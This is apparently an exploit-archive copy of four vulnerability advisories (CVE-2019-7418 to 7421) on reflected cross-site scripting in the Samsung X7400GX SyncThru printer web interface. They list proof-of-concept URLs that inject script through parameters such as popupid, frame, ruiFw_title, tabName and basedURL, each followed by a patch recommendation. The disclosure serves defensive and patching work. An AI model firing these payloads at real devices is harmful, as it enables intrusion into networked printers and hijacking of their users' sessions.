SAMSUNG X7400GX Sync Thru Web Cross Site Scripting

SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 suffers from multiple cross site scripting vulnerabilities.


MD5 | a47c5206828796cf3e2e422be90d87fa

<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7418
# Category: webapps

1. Description

XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters:
flag, frame, func, and Nfunc.


2. Proof of Concept

URL

http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org
&msg=The%20requested%20report(s)%20will%20be%20printed

Parameter
frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org


URL

http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org
&frame=&msg=The%20requested%20report(s)%20will%20be%20printed

Parameter
flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org


URL

http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed


Parameter
Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org


URL

http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed

Parameter
func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org


URL

http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed

Parameter
type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org


URL

http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg
','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed

Parameter
popupid=<SCRIPT>alert("XSS");</SCRIPT>

3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->



<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7419
# Category: webapps

1. Description

XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in "/sws/leftmenu.sws" in multiple parameters:
ruiFw_id, ruiFw_pid, ruiFw_title.


2. Proof of Concept

URL

http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E


Parameter
ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT>


URL

http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento


Parameter
ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT>


URL

http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento


Parameter
ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT>

3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->


<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7420
# Category: webapps

1. Description

XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in
"/sws.application/information/networkinformationView.sws" in the tabName


2. Proof of Concept

URL

http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E


Parameter
tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E

3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->

<!--
# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
# Date: 24-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
# Tested on: all
# CVE : CVE-2019-7421
# Category: webapps

1. Description

XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25
V11.01.05.25_08-21-2015 in "/sws.login/gnb/loginView.sws" in multiple
parameters: contextpath and basedURL.


2. Proof of Concept

URL

http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org


Parameter
contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org


URL

http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login


Parameter
basedURL=<SCRIPT>alert(XSS);</SCRIPT>


3. Solution:

Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules


-->



Related Posts